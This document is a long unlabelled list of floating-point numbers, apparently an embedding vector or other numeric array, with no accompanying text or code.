-0.011118758469820023, -0.030562616884708405, 0.0004923822125419974, 0.006072713993489742, 0.03978168964385986, -0.026050860062241554, 0.0019834970589727163, 0.000049816593673313037, 0.009330817498266697, -0.016831789165735245, -0.01646861433982849, 0.029864203184843063, -0.020407671108841896, 0.011963839642703533, -0.00912129320204258, 0.017725760117173195, -0.009547325782477856, -0.012152411974966526, 0.013500351458787918, 0.020798783749341965, 0.007724463939666748, -0.011111774481832981, -0.00604826956987381, -0.02479371428489685, 0.000754724140278995, 0.0034327071625739336, -0.03039499744772911, -0.007584781385958195, -0.059616658836603165, 0.0009149229736067355, -0.0004583345144055784, 0.021050212904810905, -0.01820068061351776, -0.0012134951539337635, 0.0048469966277480125, -0.007312399800866842, -0.019066715613007545, -0.0035968346055597067, -0.009673040360212326, -0.015574642457067966, 0.009784786961972713, -0.011132726445794106, -0.03986549749970436, -0.027238164097070694, -0.027210228145122528, 0.012599397450685501, 0.004490805324167013, 0.0216648168861866, -0.0075358920730650425, -0.007989862002432346, 0.00715176435187459, 0.0039006448350846767, -0.007787321228533983, 0.02860705740749836, -0.03276960551738739, 0.02508704736828804, 0.0023169899359345436, -0.011642569676041603, -0.020659100264310837, 0.0021441325079649687, -0.00949145294725895, -0.0022384184412658215, -0.00505652092397213, -0.027252132073044777, 0.012732096016407013, -0.009302880614995956, 0.0002793658059090376, 0.021385451778769493, -0.014876228757202625, -0.024821650236845016, 0.002741276752203703, -0.006627953611314297, -0.013297812081873417, -0.009505420923233032, -0.026218479499220848, 0.0026504830457270145, 0.07012081146240234, -0.017921315506100655, 0.006935255602002144, 0.006121602840721607, 0.000002830488256222452, 0.00008091786730801687, 0.027992451563477516, 0.0013671463821083307, -0.021832436323165894, -0.011027964763343334, 0.04992266744375229, -0.004724774044007063, 0.0442236065864563, -0.013842575252056122, -0.0023414345923811197, 0.020756877958774567, -0.02107814885675907, 0.00457461504265666, 0.003851755755022168, 0.011712410487234592, -0.005500013940036297, -0.014876228757202625, -0.0012012729421257973, -0.004253344144672155, 0.0043162014335393906, -0.019206399098038673, -0.00025383001775480807, -0.010071136988699436, -0.00333492923527956, -0.010448280721902847, -0.010846376419067383, -0.04006105288863182, 0.01656639203429222, -0.019597509875893593, 0.011384155601263046, 0.004106677137315273, 0.0045641385950148106, -0.014750514179468155, -0.00046313609345816076, -0.014471148140728474, 0.0027936578262597322, -0.005063504911959171, -0.0012597651220858097, 0.02271243929862976, -0.026050860062241554, -0.018857190385460854, -0.009959390386939049, -0.024667998775839806, 0.0007638908573426306, 0.02856515161693096, 0.005140330642461777, -0.032601986080408096, 0.016189247369766235, 0.005713030230253935, 0.01542099192738533, 0.014848291873931885, 0.0038762004114687443, -0.0033593736588954926, -0.003113182494416833, 0.01539305504411459, -0.008897799998521805, -0.004923821892589331, -0.010776535607874393, -0.0067955730482935905, -0.012801937758922577, -0.017725760117173195, -0.005280013661831617, -0.010846376419067383, -0.011335266754031181, 0.019066715613007545, -0.0011157171102240682, 0.005793347954750061, 0.008185417391359806, -0.005496521946042776, 0.02137148380279541, 0.008087639696896076, -0.0081295445561409, 0.008765101432800293, 0.01592385023832321, -0.014722577296197414, 0.0020638147834688425, -0.012536539696156979, -0.0261346697807312, -0.008520656265318394, -0.00482255220413208, 0.022335294634103775, -0.021008307114243507, -0.016328930854797363, 0.05408521741628647, 0.0038762004114687443, 0.015253372490406036, 0.02067306824028492, 0.008339068852365017, 0.0077663687989115715, 0.001857782481238246, 0.009931453503668308, 0.0021581007167696953, 0.0006050015217624605, -0.0460953563451767, -0.02835562825202942, 0.02271243929862976, 0.01641274057328701, 0.037462953478097916, 0.010783519595861435, -0.014513052999973297, 0.014359401538968086, 0.00002404892074991949, 0.017376551404595375, -0.022153707221150398, 0.020407671108841896, -0.018731476739048958, -0.013200033456087112, 0.00900256261229515, -0.007640654221177101, 0.0017643695464357734, 0.004008898977190256, 0.027992451563477516, -0.0022681010887026787, 0.005423188209533691, -0.00021301642118487507, -0.026008954271674156, -0.0238997433334589, 0.012550508603453636, 0.007417161948978901, 0.04151375591754913, 0.024402601644396782, -0.0180470310151577, -0.011880029924213886, 0.020212115719914436, 0.0184940155595541, 0.01455495785921812, 0.01415686123073101, 0.010127009823918343, 0.02399752102792263, 0.013276859186589718, 0.017320679500699043, -0.004155565984547138, 0.020896561443805695, -0.010301613248884678, -0.0027971500530838966, -0.019401954486966133, 0.05215759202837944, 0.015015911310911179, -0.006390492431819439, -0.0034274691715836525, -0.03469723090529442, -0.00443842401728034, 0.02409529872238636, -0.0014011940220370889, 0.012725112028419971, 0.0334121473133564, -0.02409529872238636, 0.022935930639505386, 0.006662874016910791, -0.01442924328148365, -0.012753047980368137, 0.007270494941622019, -0.007493987213820219, 0.008555577136576176, 0.012857810594141483, 0.026316257193684578, -0.014820354990661144, 0.0063171591609716415, 0.0016980201471596956, -0.006750175729393959, 0.005053028929978609, -0.0014989720657467842, -0.021399419754743576, -0.022433072328567505, 0.0012126221554353833, 0.0184940155595541, -0.011810189113020897, -0.009896533563733101, 0.01843814179301262, 0.0005342870717868209, -0.011216536164283752, 0.005943507421761751, 0.00021498071146197617, 0.032546114176511765, -0.008800022304058075, -0.01155177503824234, 0.02077084593474865, -0.010713677853345871, -0.007326367776840925, 0.005227632354944944, 0.012257173657417297, -0.008387957699596882, 0.008841927163302898, -0.021846404299139977, 0.01691559888422489, -0.007864147424697876, 0.052772197872400284, -0.028634993359446526, -0.007710495963692665, 0.020910529419779778, 0.009044467471539974, -0.0175581406801939, -0.0010546058183535933, 0.009128277190029621, 0.008807006292045116, 0.0027954040560871363, -0.033942945301532745, -0.0021668309345841408, -0.0013985750265419483, -0.010727646760642529, -0.02602292411029339, 0.010951139032840729, -0.019946716725826263, -0.0016430200776085258, 0.006079697981476784, 0.006278746295720339, -0.019122587516903877, -0.007808273658156395, -0.009561293758451939, 0.022419104352593422, 0.00044785827049054205, -0.015239403583109379, -0.030171506106853485, 0.009358754381537437, -0.006924779620021582, 0.009931453503668308, 0.02802038937807083, -0.0050914413295686245, -0.006537159439176321, 0.02866292931139469, 0.025226730853319168, 0.0038203271105885506, -0.018577825278043747, 0.01610543765127659, 0.008450815454125404, 0.002889689989387989, 0.0004644456203095615, 0.0022279422264546156, -0.0026888956781476736, -0.0017565124435350299, -0.022321326658129692, 0.016077501699328423, 0.021245768293738365, -0.012780984863638878, -0.0035898503847420216, 0.024416569620370865, -0.00239730766043067, -0.015937818214297295, -0.00927494466304779, -0.018954968079924583, -0.0002780562499538064, 0.008059702813625336, -0.009428595192730427, -0.006411444861441851, 0.0008407164132222533, -0.012655270285904408, -0.0216648168861866, 0.012068602256476879, -0.021455293521285057, -0.011586695909500122, 0.01142606046050787, -0.020589258521795273, 0.02429085597395897, 0.002222704002633691, 0.006959700491279364, -0.000028182115784147754, -0.017683854326605797, 0.028593089431524277, 0.014932101592421532, 0.0009105578646995127, 0.015686389058828354, -0.00862541887909174, 0.010301613248884678, 0.004843504633754492, -0.00166746461763978, 0.010497169569134712, 0.002849531127139926, 0.029780393466353416, -0.02335498109459877, -0.02469593659043312, 0.005140330642461777, 0.02281021699309349, -0.028886422514915466, 0.003834295552223921, -0.014052099548280239, -0.010154946707189083, 0.0029246106278151274, 0.01829846017062664, -0.028942296281456947, 0.007696527522057295, -0.023313075304031372, -0.027154354378581047, -0.020198145881295204, -0.03207119181752205, 0.011991776525974274, -0.005070488899946213, -0.0194298904389143, 0.01477845013141632, -0.03014356829226017, -0.010762566700577736, 0.0325181782245636, -0.0009550817776471376, 0.02092449739575386, -0.02255878783762455, -0.009903517551720142, 0.010657805018126965, 0.022824184969067574, 0.013207017444074154, 0.022488946095108986, -0.01135621964931488, -0.02458418905735016, 0.01011304184794426, -0.038999464362859726, 0.01477845013141632, 0.025855304673314095, -0.0018333380576223135, -0.010245740413665771, 0.014415275305509567, 0.015784166753292084, -0.0034327071625739336, 0.013458446599543095, 0.03659692034125328, -0.015798134729266167, -0.013619082048535347, -0.003244135295972228, 0.0035898503847420216, -0.0032685797195881605, 0.0009096848662011325, -0.025156889110803604, 0.00977081898599863, -0.03578675910830498, -0.010636852122843266, 0.003107944503426552, 0.003378580091521144, -0.020687036216259003, 0.010993043892085552, 0.005978427827358246, 0.016440676525235176, -0.036568980664014816, -0.005147314630448818, -0.03246230632066727, 0.007989862002432346, -0.0027727053966373205, -0.0361778698861599, 0.01769782230257988, -0.03198738396167755, 0.015881944447755814, 0.013674955815076828, -0.00810160767287016, 0.0033157228026539087, -0.012655270285904408, 0.009414627216756344, 0.023564504459500313, -0.011251457035541534, -0.03777025640010834, -0.01983497105538845, 0.008073671720921993, 0.029389280825853348, 0.01919242925941944, -0.0038377875462174416, -0.009805738925933838, -0.02424895018339157, 0.0006744064739905298, 0.012739080004394054, -0.008199386298656464, -0.014003210701048374, -0.0008324227528646588, 0.00840192660689354, 0.02304767817258835, 0.02538038231432438, -0.01725083775818348, -0.029836267232894897, 0.01814480870962143, 0.00639398442581296, -0.0003114491992164403, -0.02642800472676754, -0.010539074428379536, 0.012641302309930325, 0.01820068061351776, -0.017977189272642136, 0.010015263222157955, 0.008918752893805504, -0.014149877242743969, -0.0032755639404058456, -0.010888281278312206, -0.010972091928124428, -0.03282548114657402, -0.004372074734419584, 0.014387338422238827, -0.03033912554383278, 0.019262271001935005, -0.009421611204743385, -0.005667633377015591, -0.0040857247076928616, -0.0015068292850628495, -0.011628600768744946, -0.007577796932309866, 0.01775369606912136, 0.03620580583810806, 0.00785716250538826, 0.06296905130147934, 0.010650821030139923, -0.023145455867052078, -0.018019093200564384, -0.0073403362184762955, 0.02944515459239483, 0.002664451254531741, -0.002364133019000292, 0.010594947263598442, -0.015015911310911179, -0.014736545272171497, 0.0025544508825987577, -0.02395561710000038, 0.017781632021069527, -0.016245121136307716, 0.004592075012624264, 0.014792419038712978, 0.007326367776840925, 0.013751781545579433, -0.010951139032840729, 0.016845757141709328, 0.00977081898599863, 0.024179108440876007, -0.028830550611019135, -0.015029879286885262, -0.006711763329803944, 0.0066454135812819, 0.012278126552700996, -0.005856205243617296, 0.018410205841064453, -0.034334056079387665, 0.0024130220990628004, -0.0024130220990628004, -0.019611477851867676, -0.00764763867482543, -0.007158748339861631, -0.004784139338880777, 0.01824258640408516, 0.0048295361921191216, 0.03838485851883888, 0.013577177189290524, -0.006680334452539682, -0.0013165113050490618, -0.024667998775839806, 0.003423976944759488, 0.01321400236338377, -0.01542099192738533, -0.020840687677264214, 0.02028195559978485, -0.0034501675982028246, -0.02955690026283264, -0.01254352368414402, 0.010685741901397705, -0.00914923008531332, -0.02092449739575386, 0.0106089161708951, 0.008325100876390934, 0.017669886350631714, 0.005000647623091936, 0.006338111590594053, 0.017781632021069527, -0.005569855682551861, 0.015574642457067966, -0.0052904896438121796, 0.007591765373945236, -0.012529555708169937, -0.0017355600139126182, 0.011607648804783821, 0.004022867418825626, 0.005318426061421633, 0.012403841130435467, -0.00860446598380804, -0.013619082048535347, -0.010895266197621822, 0.014987974427640438, 0.00591207854449749, -0.0030049283523112535, 0.007654622662812471, 0.009016530588269234, 0.03221087530255318, -0.008646370843052864, -0.0067920805886387825, -0.00828319601714611, -0.00039002083940431476, -0.009889548644423485, -0.0013750034850090742, -0.004626995883882046, -0.007466050796210766, 0.018954968079924583, -0.023983553051948547, 0.033188655972480774, -0.016943534836173058, 0.007326367776840925, 0.005503505934029818, 0.013416541740298271, 0.00852764118462801, -0.004543186165392399, -0.00040180658106692135, 0.021301642060279846, -0.00227508507668972, 0.012641302309930325, -0.004578107036650181, -0.013004477135837078, 0.018074966967105865, -0.01750226691365242, -0.01983497105538845, -0.008038750849664211, 0.011237489059567451, 0.014010194689035416, 0.0019625446293503046, 0.02825785055756569, -0.030367061495780945, 0.014024162665009499, -0.00690382719039917, -0.0006678588688373566, 0.010699709877371788, 0.014820354990661144, 0.003300008364021778, 0.015071784146130085, -0.007703511510044336, -0.0017643695464357734, -0.012040665373206139, -0.006264777854084969, 0.01586797647178173, -0.0037714382633566856, -0.018927032127976418, -0.004892393480986357, 0.01789337955415249, -0.010504153557121754, -0.00838097371160984, 0.0011803205125033855, 0.012012729421257973, 0.005733982659876347, 0.0009638119954615831, -0.01440130639821291, -0.011460981331765652, -0.0066314456053078175, -0.010951139032840729, -0.029473090544342995, 0.0051438226364552975, -0.026400066912174225, 0.0007355177658610046, -0.010650821030139923, 0.007675575092434883, -0.010951139032840729, -0.009226054884493351, -0.006435889285057783, 0.002596355741843581, 0.027852769941091537, -0.008415894582867622, 0.004571122583001852, 0.0004906361573375762, -0.006806049030274153, -0.015141625888645649, -0.002741276752203703, -0.01963941566646099, -0.01561654731631279, -0.023215297609567642, -0.004057788290083408, -0.0017896870849654078, -0.01536511816084385, -0.03240643069148064, -0.00021181601914577186, -0.014296544715762138, -0.0063485875725746155, 0.006659382022917271, 0.007612717803567648, 0.018060998991131783, 0.007829226553440094, 0.004239375703036785, 0.010993043892085552, 0.007221605628728867, -0.0010554789332672954, 0.024612126871943474, -0.004113661125302315, 0.010280661284923553, -0.00008942979184212163, -0.010343518108129501, 0.005943507421761751, -0.015560674481093884, 0.0017582584405317903, 0.01814480870962143, -0.00909335631877184, 0.02250291407108307, 0.0058387452736496925, 0.026861021295189857, -0.0006648032576777041, -0.017460361123085022, 0.0071098594926297665, 0.004508265294134617, -0.018815286457538605, -0.0017163535812869668, -0.009044467471539974, -0.021636880934238434, 0.022530851885676384, 0.025967050343751907, 0.04240772873163223, 0.00002810027035593521, 0.00763367023319006, -0.011607648804783821, -0.031540397554636, -0.008311131969094276, -0.005985412281006575, 0.01769782230257988, 0.011509870178997517, 0.006687318440526724, 0.011621616780757904, 0.01789337955415249, 0.0060831899754703045, -0.015407023020088673, -0.010001295246183872, 0.02504514344036579, -0.02975245751440525, -0.017586076632142067, -0.007473034784197807, -0.005084457341581583, -0.006694302894175053, 0.004089216701686382, 0.0020428623538464308, -0.015253372490406036, -0.008373989723622799, -0.02151116542518139, 0.010057168081402779, -0.015029879286885262, -0.018354332074522972, 0.0135352723300457, -0.0029979441314935684, -0.007347320206463337, -0.0013942099176347256, 0.010140977799892426, 0.004372074734419584, -0.004487312864512205, -0.02137148380279541, 0.0032930243760347366, -0.006219381000846624, 0.017627980560064316, -0.005545410793274641, -0.008646370843052864, 0.01378670148551464, 0.0022942915093153715, 0.021888310089707375, 0.0023152439389377832, -0.015253372490406036, -0.01437336951494217, -0.011544791050255299, 0.009638119488954544, -0.010720661841332912, -0.023173391819000244, -0.004679377190768719, -0.02162291295826435, 0.004455884452909231, 0.02088259346783161, -0.009435579180717468, 0.0019695288501679897, 0.00727747892960906, 0.01666416972875595, 0.03380326181650162, 0.004602551460266113, 0.016636233776807785, 0.014946069568395615, -0.007403193507343531, 0.013207017444074154, -0.00810160767287016, -0.01033653412014246, -0.01656639203429222, 0.008394941687583923, 0.005692077800631523, -0.010678756982088089, 0.006463826168328524, 0.021497197449207306, 0.011097806505858898, 0.008988594636321068, 0.02563181146979332, 0.015099721029400826, 0.02077084593474865, -0.008443831466138363, 0.02063116431236267, -0.0025631811004132032, -0.008087639696896076, -0.0031620715744793415, -0.030702300369739532, -0.018312428146600723, -0.021930214017629623, -0.005688585806638002, -0.008695260621607304, -0.010064153000712395, 0.005517474375665188, 0.003492072457447648, -0.014135909266769886, -0.007396209519356489, 0.00010667189781088382, 0.0008690895047038794, -0.006823509465903044, 0.006187952123582363, 0.016594327986240387, 0.0014911149628460407, 0.009044467471539974, -0.002978737698867917, -0.005601284094154835, -0.012822889722883701, -0.0180470310151577, -0.006921287626028061, 0.0033139768056571484, -0.020240051671862602, 0.0026958798989653587, -0.003911121282726526, 0.011384155601263046, -0.008464783430099487, 0.006495254579931498, 0.013744796626269817, -0.003406516509130597, 0.007424145936965942, 0.00614953925833106, -0.000007120554073480889, -0.009938438422977924, 0.01909465156495571, 0.009079388342797756, -0.0018176237354055047, 0.009058435447514057, -0.001801909413188696, -0.004923821892589331, -0.015532737597823143, -0.01316511258482933, 0.015770198777318, -0.024234982207417488, -0.008813990280032158, -0.0001958834327524528, -0.01281590573489666, 0.0155467065051198, -0.0010554789332672954, -0.008080655708909035, -0.018605761229991913, -0.003102706279605627, 0.010273677296936512, 0.016245121136307716, 0.008862880058586597, 0.023410852998495102, 0.01754417084157467, 0.000912303919903934, -0.000023462362150894478, -0.019765129312872887, 0.030367061495780945, 0.0007307161577045918, -0.028229912742972374, 0.012697175145149231, 0.019751161336898804, 0.028271818533539772, -0.004141598008573055, 0.0051089017651975155, 0.0004234137886669487, 0.0083530368283391, -0.001407305127941072, -0.0013444478390738368, -0.018619729205965996, 0.003932073712348938, -0.007787321228533983, 0.0015103212790563703, -0.0058352528139948845, 0.02186037227511406, 0.012501618824899197, -0.014499085023999214, -0.007417161948978901, 0.02096640318632126, 0.0021912753582000732, -0.0050914413295686245, -0.002929848851636052, -0.02304767817258835, -0.005699062254279852, 0.006837477907538414, 0.008869864046573639, -0.007085415069013834, 0.0040682642720639706, -0.0033244530204683542, -0.0016875439323484898, -0.01690163090825081, -0.010392407886683941, -0.0256876852363348, 0.027838801965117455, -0.00877907034009695, -0.006226364988833666, 0.007347320206463337, 0.023676250129938126, -0.006977160461246967, -0.001278971554711461, 0.0033750878646969795, 0.04282677546143532, -0.0068095410242676735, -0.0070435102097690105, -0.01685972511768341, 0.019667351618409157, -0.012613365426659584, -0.03827311471104622, -0.0075708129443228245, -0.01977909728884697, -0.010867329314351082, -0.012054634280502796, -0.00045746148680336773, -0.013402573764324188, -0.0027063561137765646, -0.010071136988699436, 0.0031114364974200726, -0.03693215921521187, -0.011258441023528576, 0.013800670392811298, -0.015951786190271378, 0.01008510496467352, -0.024681968614459038, 0.0038482637610286474, -0.010078120976686478, 0.01229907851666212, 0.003994931001216173, 0.006310174707323313, -0.0058876341208815575, 0.009812723845243454, -0.020784815773367882, -0.0018996873404830694, -0.008024781942367554, -0.01606353372335434, 0.018270522356033325, -0.02969658374786377, -0.0023571487981826067, -0.007961925119161606, 0.0238997433334589, 0.027629276737570763, 0.022516882047057152, 0.0024985778145492077, -0.00958923064172268, -0.00117159029468894, -0.01789337955415249, 0.013060350902378559, -0.027140386402606964, 0.00010940008360194042, -0.011593679897487164, 0.01600765995681286, 0.0011646061902865767, -0.01602162793278694, -0.005346362944692373, -0.02666546404361725, -0.00003178331462549977, 0.004522233735769987, -0.004536202177405357, -0.000518136250320822, -0.00294905505143106, -0.0068095410242676735, -0.00003254720650147647, -0.03525596112012863, -0.0021930213551968336, 0.02681911550462246, 0.004180010873824358, 0.008094623684883118, -0.009177166037261486, -0.011370187625288963, 0.0068793827667832375, -0.013430510647594929, -0.025799430906772614, 0.022447042167186737, -0.00381683511659503, -0.004410487599670887, 0.001464924425818026, 0.0021022276487201452, -0.009051451459527016, -0.0034501675982028246, -0.02448641136288643, 0.006868906319141388, -0.005245092790573835, 0.012306063435971737, 0.015001943334937096, 0.004529217723757029, -0.004117153584957123, -0.0018734968034550548, -0.016594327986240387, 0.004459376446902752, -0.0184940155595541, -0.024514347314834595, 0.008827959187328815, -0.019276238977909088, 0.0133117800578475, 0.004606043454259634, -0.013926384970545769, 0.011628600768744946, -0.0054092202335596085, -0.0021825451403856277, -0.00803176686167717, -0.04089915007352829, 0.008946689777076244, 0.008820975199341774, 0.027098482474684715, 0.010650821030139923, -0.011013996787369251, 0.002259370870888233, -0.006921287626028061, 0.007913036271929741, 0.008136528544127941, -0.019695287570357323, -0.034836914390325546, 0.011209552176296711, 0.011935903690755367, 0.026092765852808952, 0.013297812081873417, 0.01829846017062664, 0.002049846574664116, 0.0008223830373026431, 0.00046182656660676, -0.022321326658129692, 0.006673350464552641, 0.016091469675302505, 0.004455884452909231, -0.011279393918812275, 0.019401954486966133, -0.003994931001216173, 0.03156833350658417, 0.02107814885675907, 0.021147990599274635, -0.03628961741924286, 0.005112393759191036, -0.01437336951494217, 0.01008510496467352, 0.003153341356664896, 0.0061355712823569775, 0.010434312745928764, 0.018913064152002335, -0.025464192032814026, -0.006236841436475515, -0.03184770047664642, 0.03223881125450134, -0.008911768905818462, 0.000016873802451300435, 0.009484468959271908, -0.005824776832014322, -0.005028584040701389, -0.012201300822198391, 0.026400066912174225, 0.010909234173595905, -0.002379847224801779, 0.0002712903660722077, 0.01009208895266056, 0.01465273555368185, 0.01666416972875595, 0.012990509159862995, -0.01641274057328701, -0.02230735868215561, 0.00849970430135727, -0.005960967391729355, -0.016720043495297432, 0.0040682642720639706, 0.007298431359231472, 0.0004915092140436172, 0.004235883709043264, -0.015253372490406036, -0.0070260497741401196, -0.00774541636928916, 0.0022331802174448967, 0.0021598467137664557, 0.012354952283203602, 0.005039060488343239, 0.020645132288336754, 0.01542099192738533, -0.006739699747413397, -0.002690641675144434, -0.011593679897487164, -0.00457461504265666, -0.017292741686105728, -0.012215268798172474, 0.00815748143941164, -0.028634993359446526, -0.000726351048797369, -0.02547816000878811, 0.014946069568395615, 0.020533384755253792, 0.003039848990738392, 0.005035568494349718, -0.03355183079838753, 0.007382241077721119, 0.016845757141709328, -0.0013584161642938852, -0.00949843693524599, -0.01596575416624546, 0.012040665373206139, -0.012997493147850037, 0.022097833454608917, 0.02360641025006771, -0.015029879286885262, -0.0037923906929790974, -0.012243205681443214, 0.001075558247976005, -0.008981610648334026, -0.003729533404111862, -0.009226054884493351, -0.004850488621741533, -0.0073752570897340775, -0.011572727933526039, -0.002437466522678733, -0.00860446598380804, 0.038105495274066925, 0.005618744529783726, 0.028397532179951668, 0.011502886191010475, 0.0031044522766023874, -0.0009707960998639464, 0.008150496520102024, 0.013137176632881165, 0.017809569835662842, 0.02975245751440525, 0.01294162031263113, -0.019164493307471275, -0.007850178517401218, -0.03841279819607735, 0.02557593770325184, -0.0023955616634339094, 0.018326396122574806, 0.0011130981147289276, 0.016887662932276726, 0.003705088747665286, -0.0007844067877158523, -0.006858430337160826, -0.009910501539707184, 0.02067306824028492, -0.01913655735552311, -0.015281308442354202, 0.013800670392811298, -0.0018420681590214372, -0.009652088396251202, -0.005709538236260414, -0.019946716725826263, -0.015141625888645649, -0.009728914126753807, 0.0008782562217675149, -0.00555239524692297, -0.026386098936200142, -0.0031393731478601694, -0.007193669211119413, 0.003247627289965749, 0.00865335576236248, 0.0005705173243768513, -0.010944155044853687, -0.001402940135449171, -0.013521304354071617, -0.011859077960252762, 0.030478807166218758, 0.012627333402633667, 0.0015775436768308282, 0.00738922506570816, 0.0050914413295686245, 0.01095812302082777, -0.0035287390928715467, 0.006236841436475515, 0.012306063435971737, -0.007717479951679707, 0.02205592952668667, -0.01455495785921812, 0.012550508603453636, 0.002212227787822485, 0.019667351618409157, -0.016245121136307716, 0.0026260383892804384, 0.002477625384926796, 0.02380196563899517, -0.014052099548280239, -0.00046269959420897067, 0.0021650849375873804, 0.00172246468719095, -0.0026836576871573925, 0.004787631332874298, -0.014317496679723263, 0.0175581406801939, -0.0013374637346714735, 0.001148891868069768, 0.0005334140732884407, -0.005807316396385431, 0.008709228597581387, -0.0012126221554353833, -0.011991776525974274, 0.003092230064794421, -0.01217336393892765, 0.009065420366823673, 0.015476864762604237, 0.008192401379346848, -0.018507983535528183, 0.021525133401155472, 0.006956208031624556, -0.019010841846466064, -0.0027971500530838966, 0.007424145936965942, 0.016287025064229965, 0.0017381790094077587, -0.017292741686105728, 0.00909335631877184, 0.05143124237656593, -0.0021930213551968336, 0.026190543547272682, 0.0075219240970909595, 0.020784815773367882, 0.022139739245176315, 0.03302103653550148, 0.009624151512980461, -0.009700977243483067, 0.008332084864377975, -0.0023414345923811197, -0.019625447690486908, -0.016245121136307716, 0.002612070180475712, -0.002252386650070548, 0.005349854938685894, 0.004990171641111374, -0.010057168081402779, -0.015379087068140507, -0.0207289420068264, 0.0022541326470673084, -0.01321400236338377, 0.0010380184976384044, 0.024863556027412415, -0.009875580668449402, -0.0025300064589828253, 0.007913036271929741, 0.0008215100388042629, -0.0012204792583361268, -0.02944515459239483, 0.005070488899946213, 0.019709257408976555, 0.004330169875174761, -0.012459713965654373, 0.01405908353626728, -0.008325100876390934, -0.0021441325079649687, -0.007843194529414177, 0.012878762558102608, -0.01551876962184906, 0.014638767577707767, -0.0033873103093355894, -0.015644485130906105, 0.006205412559211254, 0.00023353233700618148, 0.003226674860343337, 0.0004255963140167296, -0.03237849473953247, 0.010329550132155418, 0.005583823658525944, -0.024556253105401993, 0.021385451778769493, -0.0038587399758398533, 0.0049482667818665504, 0.014680672436952591, -0.005929538980126381, -0.0020463543478399515, -0.015448927879333496, -0.007088907063007355, -0.0020847672130912542, 0.0009646849939599633, -0.01730671152472496, -0.01093018613755703, -0.016692105680704117, 0.0003756160440389067, -0.024667998775839806, 0.0006032555247657001, 0.025855304673314095, -0.023089582100510597, -0.005377791356295347, 0.019108619540929794, 0.01197780855000019, 0.005213663913309574, 0.015141625888645649, -0.002788419835269451, -0.003935565706342459, 0.04874933138489723, 0.010392407886683941, 0.03268579766154289, 0.01046224869787693, -0.010573995299637318, 0.013856543228030205, -0.03223881125450134, -0.014359401538968086, -0.01695750281214714, 0.011537807062268257, -0.015784166753292084, -0.000016478215911774896, -0.005849221255630255, -0.0009306372958235443, -0.01641274057328701, 0.014240670949220657, 0.006369540002197027, 0.002269847085699439, 0.020267987623810768, 0.0067781126126646996, -0.0030817538499832153, 0.012885747477412224, 0.007668591104447842, -0.010685741901397705, 0.004693345166742802, -0.0030642934143543243, 0.010427327826619148, -0.010399391874670982, 0.004235883709043264, 0.005066996905952692, 0.012934636324644089, 0.005506998393684626, 0.0031393731478601694, 0.005080965347588062, 0.0009341293480247259, 0.016049563884735107, -0.0056047760881483555, -0.015015911310911179, -0.010189867578446865, -0.022544819861650467, 0.011747331358492374, 0.011803205125033855, 0.021134022623300552, -0.01666416972875595, -0.013570193201303482, -0.026148637756705284, -0.035926442593336105, 0.00974288210272789, -0.020100368186831474, 0.008786054328083992, -0.014331464655697346, -0.019625447690486908, -0.0019782590679824352, 0.006813033018261194, -0.023536568507552147, 0.02781086415052414, -0.017292741686105728, -0.014540989883244038, 0.02226545289158821, 0.008765101432800293, 0.007731448393315077, 0.003102706279605627, 0.004557154607027769, -0.01859179325401783, 0.01477845013141632, -0.0036073108203709126, -0.0011104790028184652, 0.0032284208573400974, -0.004288265015929937, 0.00070976372808218, -0.012920667417347431, 0.005632712971419096, -0.011761300265789032, -0.011656537652015686, 0.007050494197756052, 0.009009546600282192, 0.004145090002566576, -0.0025247682351619005, -0.004246360156685114, -0.002004449488595128, 0.020798783749341965, -0.005395251791924238, -0.003186515998095274, 0.0008542481809854507, 0.003631755243986845, -0.015756230801343918, -0.0010720662539824843, 0.01396130584180355, 0.0016430200776085258, 0.009603199549019337, 0.02265656553208828, 0.025073079392313957, -0.00578985596075654, 0.0030782618559896946, -0.00909335631877184, -0.02874673902988434, 0.006163507699966431, 0.009931453503668308, 0.011635584756731987, -0.006058745551854372, -0.012920667417347431, -0.019010841846466064, 0.0017600044375285506, 0.0004354177799541503, 0.0042044552974402905, -0.033635642379522324, -0.0008306766976602376, 0.0006368667236529291, -0.006607001181691885, -0.018158776685595512, 0.026623560115695, 0.030171506106853485, -0.0184940155595541, 0.018382269889116287, 0.008513672277331352, -0.00603779312223196, 0.00984065979719162, 0.01765591837465763, 0.019569573923945427, -0.007878115400671959, -0.02374609187245369, 0.027140386402606964, 0.013486383482813835, 0.026218479499220848, -0.006191444583237171, 0.00003412955265957862, 0.0023152439389377832, -0.005765411537140608, 0.01232003141194582, -0.0016971471486613154, -0.006662874016910791, 0.0030782618559896946, 0.024612126871943474, 0.03282548114657402, 0.0189829058945179, 0.015127657912671566, -0.03673660010099411, -0.0021947675850242376, 0.0035130248870700598, -0.011663521640002728, 0.008688275702297688, -0.009959390386939049, -0.02746165730059147, -0.017167028039693832, -0.008737165480852127, -0.01818671263754368, 0.0036108028143644333, 0.02454228512942791, -0.016231153160333633, 0.01711115427315235, -0.022041961550712585, 0.006764144171029329, -0.01977909728884697, -0.0011331775458529592, -0.012452729977667332, -0.013940352946519852, 0.009240023791790009, 0.0032808019313961267, -0.010518122464418411, -0.0014212734531611204, 0.03246230632066727, 0.0008843673276714981, -0.011467965319752693, -0.014205750077962875, -0.009058435447514057, -0.0078012896701693535, 0.008436846546828747, 0.023327043280005455, -0.02776896022260189, -0.02181846834719181, -0.0035723899491131306, 0.016133373603224754, 0.009407643228769302, 0.03357976675033569, 0.010078120976686478, 0.008262243121862411, 0.014722577296197414, -0.010636852122843266, -0.010406375862658024, 0.001109606004320085, 0.01046224869787693, 0.035228025168180466, 0.028076261281967163, -0.0211759265512228, -0.002353656804189086, 0.0014291306724771857, 0.007134303916245699, -0.0031585795804858208, 0.009826691821217537, 0.020407671108841896, 0.002369371009990573, 0.0334121473133564, 0.0051787435077130795, -0.016692105680704117, 0.009673040360212326, 0.003897152841091156, 0.029137851670384407, -0.012662254273891449, -0.01477845013141632, -0.005646680947393179, 0.0008638513972982764, -0.0037923906929790974, 0.010923202149569988, 0.005147314630448818, 0.02067306824028492, 0.008555577136576176, -0.011237489059567451, 0.000563096662517637, 0.006481286138296127, 0.00884891115128994, -0.00838097371160984, 0.023969585075974464, -0.004309217445552349, -0.01968131959438324, -0.004553662613034248, -0.02022608369588852, -0.004714297596365213, -0.007975893095135689, 0.0004144653503317386, 0.002798896050080657, -0.018060998991131783, -0.016440676525235176, 0.0055558872409164906, -0.016091469675302505, -0.018815286457538605, 0.02415117248892784, 0.000506350479554385, 0.003429215168580413, -0.017083218321204185, -0.019667351618409157, -0.0028355626855045557, 0.01108383759856224, 0.003851755755022168, -0.02964070998132229, 0.00998732727020979, -0.011488918215036392, -0.01889909617602825, 0.0005609141080640256, -0.01715306006371975, 